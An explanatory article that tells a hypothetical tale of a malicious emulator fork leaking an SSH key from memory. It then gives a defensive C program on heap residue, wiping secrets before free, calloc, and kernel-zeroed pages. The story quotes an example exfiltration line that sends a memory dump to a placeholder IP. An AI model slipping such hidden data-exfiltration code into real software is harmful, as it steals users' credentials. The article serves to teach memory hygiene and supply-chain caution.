Imagine that you download a sweet NES emulator...well, not quite. The original version was abandoned four years ago and its site was pulled last week, and you're currently looking at one of the forks made at the last minute. It's from someone named Kadesh-something on GitHub, but he says he's going to continue development and keep it maintained, so it's all good. He even says that he already added some improvements, so you give it a try, excited. When you run it, it's weirdly slow for a minute at startup, but aside from that it works just as well as the original. Most of the performance boost is down to your machine having more resources than the last one, so you're not quite sure where exactly the improvements are. Maybe he fixed that rare rendering glitch with certain games? Maybe he fixed that crashing bug. Who knows? But you enjoy playing nonetheless.

A week later, the servers you SSH into get broken into. How did this happen? You were careful with that SSH key. There's no way someone could have gotten it unless...oh shit. You go back to the source tree of the NES emulator and investigate the latest commits, and what you find is, to put it bluntly, horrifying. Turns out, the NES emulator was modified to secretly `malloc` a gigabyte-sized block of memory on startup and to reuse an existing function in the codebase that (used to) send bug reports, so that it instead sends that block to his own server. It's actually quite clever. The sending happens in a separate thread in the background while you play, which is apparently long enough for a good chunk of that data to get through. Moreover, those 5-or-so lines are the only part of the code that is inconsistent with the rest, style-wise, and they look like crap because of the lazy formatting.

There are even comments with lame excuses like "char*mem1=malloc(1024*1024*1024);//prevent memory error allocation for good happy game", and "fwrite(mem,1024*1024*1024,1,mem1File); net_send_file(mem1File, "http://123.456.78.901");//just for debugging reason so I can fix program". Obviously, that's a load of crap, and you're angry at yourself for not having checked the commit diff to see what he did beforehand. But now you're confused. I mean, who would be stupid enough to put malicious code in a public codebase? Or rather--who would be stupid enough to RUN malicious code from a public codebase? The clever bastard knew his account was too obscure for anyone to pay attention to his work, and people who DID come across it would generally assume Linus' Law would be in effect ("given enough eyeballs, all bugs are shallow"; nobody was looking). You assumed that, too, and now you're paying for it.

Since you regularly ssh into a server for your job, that means he apparently managed to obtain your private SSH key while it was still sitting in RAM: the key material had been loaded into memory, that memory was freed without being cleared, and the emulator's giant `malloc` was handed the leftovers. (A public key would have been useless to him; it's the private key that lets him authenticate as you.) Weird, because you -assumed- that OpenSSH would wipe that memory before freeing it (IRL, it does make an effort to, but pretend it doesn't for now). Whoops! If only the memory had been wiped before being handed out again, eh? ... Real-world operating systems do exactly that: the kernel zeroes pages before giving them to a process, which is where `malloc` gets fresh memory from, precisely so that one process can never read another process's leftovers. What `malloc` does not do is zero memory it recycles within your own process, which is why `calloc` exists and why secrets should be wiped before they are freed.
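To make the distinction at the end concrete, here is a small C program, added for this article and not code from the emulator, OpenSSH, or any real project, that checks three things: whether a secret written into a heap buffer and freed without a wipe can still be read from the next allocation of the same size (residue within one process, allocator-dependent), whether wiping before `free` or using `calloc` closes that gap, and whether freshly mapped pages from the kernel are all zeros (the cross-process case the story depends on). The secret string is a constructed placeholder, and the 1 MiB mapping size is an arbitrary choice.

```c
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

/* Constructed sample secret; stands in for private key material. */
#define SECRET "ssh-rsa-PRIVATE-KEY-MATERIAL-0123456789"
#define BUF_BYTES 256
#define MAP_BYTES (1u << 20)   /* 1 MiB of fresh anonymous pages (arbitrary size) */
#define SECRET_OFFSET 64       /* keep the secret clear of allocator metadata */

/* Return 1 if SECRET appears anywhere in buf, else 0. */
static int contains_secret(const unsigned char *buf, size_t len) {
    size_t n = strlen(SECRET);
    for (size_t i = 0; i + n <= len; i++)
        if (memcmp(buf + i, SECRET, n) == 0) return 1;
    return 0;
}

/* Wipe through a volatile pointer so the compiler cannot drop a
   "dead store" memset that precedes free(). */
static void secure_wipe(void *p, size_t n) {
    volatile unsigned char *v = (volatile unsigned char *)p;
    while (n--) *v++ = 0;
}

/* Heap reuse inside one process, no wipe: returns 1 if the secret is still
   readable from the next allocation (typical with glibc), 0 if this
   allocator happened to clobber or not reuse the chunk, -1 on malloc failure. */
int stale_heap_without_wipe(void) {
    unsigned char *key = malloc(BUF_BYTES);
    if (!key) return -1;
    memset(key, 'A', BUF_BYTES);
    memcpy(key + SECRET_OFFSET, SECRET, strlen(SECRET));
    free(key);                               /* no wipe before free */
    unsigned char *p = malloc(BUF_BYTES);    /* same size: likely the same chunk */
    if (!p) return -1;
    int found = contains_secret(p, BUF_BYTES);
    free(p);
    return found;
}

/* Same reuse pattern, but the secret is wiped before free(): always 0. */
int stale_heap_with_wipe(void) {
    unsigned char *key = malloc(BUF_BYTES);
    if (!key) return -1;
    memset(key, 'A', BUF_BYTES);
    memcpy(key + SECRET_OFFSET, SECRET, strlen(SECRET));
    secure_wipe(key, BUF_BYTES);
    free(key);
    unsigned char *p = malloc(BUF_BYTES);
    if (!p) return -1;
    int found = contains_secret(p, BUF_BYTES);
    free(p);
    return found;
}

/* No wipe before free(), but the reader uses calloc(): always 0, because
   calloc guarantees zeroed memory regardless of what the chunk held. */
int calloc_after_free_is_clean(void) {
    unsigned char *key = malloc(BUF_BYTES);
    if (!key) return -1;
    memset(key, 'A', BUF_BYTES);
    memcpy(key + SECRET_OFFSET, SECRET, strlen(SECRET));
    free(key);
    unsigned char *p = calloc(1, BUF_BYTES);
    if (!p) return -1;
    int found = contains_secret(p, BUF_BYTES);
    free(p);
    return found;
}

/* The cross-process case: pages freshly mapped from the kernel are zeroed
   before the process ever sees them. Returns 1 if every byte is zero. */
int fresh_os_pages_are_zero(void) {
    unsigned char *p = mmap(NULL, MAP_BYTES, PROT_READ | PROT_WRITE,
                            MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (p == MAP_FAILED) return -1;
    int all_zero = 1;
    for (size_t i = 0; i < MAP_BYTES; i++)
        if (p[i] != 0) { all_zero = 0; break; }
    munmap(p, MAP_BYTES);
    return all_zero;
}

int main(void) {
    printf("secret survives free() without wipe: %d\n", stale_heap_without_wipe());
    printf("secret survives free() after wipe:   %d\n", stale_heap_with_wipe());
    printf("secret visible through calloc():     %d\n", calloc_after_free_is_clean());
    printf("fresh kernel pages all zero:         %d\n", fresh_os_pages_are_zero());
    return 0;
}
```

The first result depends on the allocator (glibc will usually hand the same chunk straight back, with only its first few bytes overwritten by free-list bookkeeping); the other three do not. That asymmetry is the whole point: the kernel protects you from other processes' leftovers, but protecting your own freed secrets from your own later allocations is the program's job.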